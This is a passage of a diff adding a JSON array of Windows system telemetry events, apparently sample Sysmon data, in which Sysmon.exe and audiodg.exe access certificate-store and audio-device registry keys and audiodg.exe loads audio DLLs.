"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 
131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "AudioEng.dll", + "image_path": "C:\\Windows\\System32\\AudioEng.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "AUDIOKSE.dll", + "image_path": "C:\\Windows\\System32\\AUDIOKSE.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + 
"registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": 